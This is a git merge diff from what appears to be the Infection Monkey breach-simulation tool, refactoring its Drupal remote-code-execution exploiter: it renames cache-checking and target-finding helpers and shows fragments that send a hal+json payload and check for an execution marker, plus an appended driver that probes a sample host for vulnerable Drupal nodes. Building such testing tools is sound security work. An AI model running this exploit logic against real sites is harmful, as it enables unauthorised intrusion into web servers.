Merge branch '669/drupal' of https://github.com/guardicore/monkey into 669/drupal
commit 5a00d5e5f9
@@ -45,7 +45,7 @@ class DrupalExploiter(WebRCE):
         :return: None (in-place addition)
         """
         for url in potential_urls:
-            node_ids = find_articles(url)
+            node_ids = find_exploitbale_article_ids(url)
             if node_ids is None:
                 LOG.info('Could not find a Drupal node to attack')
                 continue
@@ -73,7 +73,7 @@ class DrupalExploiter(WebRCE):
                                 json=payload,
                                 headers={"Content-Type": "application/hal+json"})
 
-        if check_drupal_cache(response):
+        if is_response_cached(response):
             LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
             return False
 
@@ -89,7 +89,7 @@ class DrupalExploiter(WebRCE):
 
         r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
 
-        if check_drupal_cache(r):
+        if is_response_cached(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
 
         if ID_STRING not in r.text:
@@ -108,23 +108,22 @@ class DrupalExploiter(WebRCE):
         return self.vulnerable_urls.pop()
 
 
-def check_drupal_cache(r: requests.Response) -> bool:
-    """
-    Check if a response had the cache header.
-    """
+def is_response_cached(r: requests.Response) -> bool:
+    """ Check if a response had the cache header. """
     return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
 
 
-def find_articles(base_url: str, lower: int = 1, upper: int = 10):
-    """ Find a target article that does not 404 and is not cached """
+def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10) -> set:
+    """ Find target articles that do not 404 and are not cached """
     articles = set()
     while lower < upper:
-        u = urljoin(base_url, str(lower))
-        r = requests.get(u)
-        if r.status_code == 200:  # found an article
-            articles.add(lower)
-        if check_drupal_cache(r):
-            LOG.info(f'Found a cached article at: {lower}, skipping')
+        node_url = urljoin(base_url, str(lower))
+        response = requests.get(node_url)
+        if response.status_code == 200:
+            if is_response_cached(response):
+                LOG.info(f'Found a cached article at: {node_url}, skipping')
+            else:
+                articles.add(lower)
         lower += 1
     return articles
 
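For reference, here is how the two renamed module-level helpers read once the added lines are pulled together, plus a small driver. The helper bodies are taken from the diff above; the imports, logging setup, and the example base URL are illustrative assumptions rather than part of the commit.

import logging
from urllib.parse import urljoin

import requests

LOG = logging.getLogger(__name__)


def is_response_cached(r: requests.Response) -> bool:
    """ Check if a response had the cache header. """
    return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'


def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10) -> set:
    """ Find target articles that do not 404 and are not cached """
    articles = set()
    while lower < upper:
        # Probe consecutive node ids under the given base URL.
        node_url = urljoin(base_url, str(lower))
        response = requests.get(node_url)
        if response.status_code == 200:
            if is_response_cached(response):
                LOG.info(f'Found a cached article at: {node_url}, skipping')
            else:
                articles.add(lower)
        lower += 1
    return articles


if __name__ == '__main__':
    # Hypothetical target; any reachable Drupal /node/ base URL would do,
    # and requests will raise a ConnectionError if the host is unreachable.
    logging.basicConfig(level=logging.INFO)
    print(find_exploitbale_article_ids('http://10.0.0.5/node/'))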